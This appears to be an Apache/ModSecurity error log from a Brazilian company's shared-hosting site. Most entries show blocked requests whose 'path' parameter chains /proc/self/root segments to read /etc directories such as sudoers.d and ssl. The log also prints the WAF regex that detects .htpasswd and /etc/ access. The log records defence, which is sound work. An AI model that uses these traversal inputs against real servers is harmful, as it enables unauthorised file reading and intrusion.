[Thu Mar 19 00:20:45.485922 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.241.31:36190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrjQbLMZ6AikZjR9UH4wAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:20:45.985327 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.241.31:36190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrjQbLMZ6AikZjR9UH5QAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:20:46.726004 2026] [mime_magic:error] [pid 14269:tid 140411691570944] (70014)End of file found: [client 57.141.18.61:52960] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:20:54.025794 2026] [mime_magic:error] [pid 14269:tid 140411741927168] (70014)End of file found: [client 57.141.18.35:53144] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:20:57.133809 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:50956] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:21:03.679877 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.241.31:39590] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrnQbLMZ6AikZjR9UH9QAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:21:22.137804 2026] [proxy_fcgi:error] [pid 27403:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:51544] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:21:31.823691 2026] [:error] [pid 27403:tid 140411624429312] [client 74.7.241.31:53992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtruxkFeYa1D6dYQnCVcwAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:21:32.361282 2026] [:error] [pid 27403:tid 140411565680384] [client 74.7.241.31:53992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrvBkFeYa1D6dYQnCVdAAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:21:49.121378 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52276] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:21:51.300101 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:36764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrz9a6ubjKNq_cu4bjlgAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:21:55.577346 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:37300] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtr0-oXxyEfFpUF8f-92QAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:21:57.594169 2026] [mime_magic:error] [pid 27403:tid 140411658000128] (70014)End of file found: [client 57.141.18.37:54556] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:21:58.076324 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.241.31:38090] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtr1uyqAr6etmhZHNoQTgAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:21:59.554014 2026] [mime_magic:error] [pid 31803:tid 140411691570944] (70014)End of file found: [client 57.141.18.119:54702] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:22:05.689313 2026] [mime_magic:error] [pid 15826:tid 140411716749056] (70014)End of file found: [client 57.141.18.24:54752] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:22:09.415697 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.241.31:38100] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtr4fu8EFLIOrSqIptHGgAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:22:12.105616 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.228.61:34684] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtr5Na6ubjKNq_cu4bjoQAAA1M"]
[Thu Mar 19 00:22:24.134307 2026] [proxy_fcgi:error] [pid 17887:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:53266] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:22:30.234710 2026] [mime_magic:error] [pid 17887:tid 140411666392832] (70014)End of file found: [client 57.141.18.83:55266] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:23:01.132995 2026] [proxy_fcgi:error] [pid 15826:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54004] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:23:31.033838 2026] [proxy_fcgi:error] [pid 9333:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:54682] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:23:33.430226 2026] [:error] [pid 27293:tid 140411716749056] [client 74.7.241.31:36470] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtsNf-YZRR_7pZ7nDI6qQAAA8M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:23:55.134639 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55240] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:24:04.013822 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:49538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtsVPu8EFLIOrSqIptHTgAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 00:24:18.072422 2026] [proxy_fcgi:error] [pid 15051:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:55792] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:24:28.386592 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.241.31:57774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtsbAbLMZ6AikZjR9UIWAAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:24:40.145857 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56330] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:25:03.292005 2026] [proxy_fcgi:error] [pid 15826:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56860] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:25:15.380337 2026] [mime_magic:error] [pid 14269:tid 140411658000128] (70014)End of file found: [client 57.141.18.100:58762] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:25:25.106964 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:57372] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:25:40.276188 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.241.31:55014] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtstAbLMZ6AikZjR9UIqwAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:25:42.833367 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:59612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtstta6ubjKNq_cu4bj-gAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:25:43.524194 2026] [mime_magic:error] [pid 14269:tid 140411683178240] (70014)End of file found: [client 57.141.18.8:59474] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:25:50.129808 2026] [proxy_fcgi:error] [pid 27403:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:57912] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:26:01.815341 2026] [mime_magic:error] [pid 27403:tid 140411548894976] (70014)End of file found: [client 57.141.18.117:59886] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:26:03.946090 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:59616] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtsy9a6ubjKNq_cu4bkGQAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:26:11.145798 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:58398] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:26:24.292024 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:60946] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abts4AkwaGbbGflqUZBcVgAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 00:26:32.686002 2026] [:error] [pid 27403:tid 140411616036608] [client 74.7.243.128:38728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abts6BkFeYa1D6dYQnCV-gAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 00:26:33.117794 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58926] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:26:55.153818 2026] [proxy_fcgi:error] [pid 15826:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:59434] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:27:17.121792 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:59900] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:27:26.874574 2026] [mime_magic:error] [pid 30077:tid 140411590858496] (70014)End of file found: [client 74.7.243.128:59328] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/usr/lib
